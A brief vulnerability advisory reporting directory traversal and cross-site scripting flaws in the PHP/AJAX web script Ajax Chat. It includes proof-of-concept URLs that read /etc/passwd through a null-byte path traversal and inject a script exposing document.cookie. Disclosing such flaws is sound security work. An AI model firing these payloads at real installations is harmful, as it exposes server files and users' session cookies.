Ajax Chat suffers from directory traversal and cross site scripting vulnerabilities.
7e45a8a66aba3b10533ceb8add1e2bcfc0642f01b3d8514b808ab6b1b8713e0a
Discovered by Sirdarckcat from elhacker.net
Ajax Chat
http://www.pcdiscs.co.uk/chat/
==============================================
Ajax Chat is a web script for making an online
chat based on PHP and AJAX.
This has a Remote File Disclosure and a XSS bug.
==============================================
RFD PoC:
http://www.server.com/includes/operator_chattranscript.php?chatid=../../../../../../etc/passwd%00
==============================================
XSS PoC:
http://www.server.com/visitor/livesupport/chat.php?userid=<script>alert(document.cookie)</script>
==============================================
Att.
Sirdarckcat
elhacker.net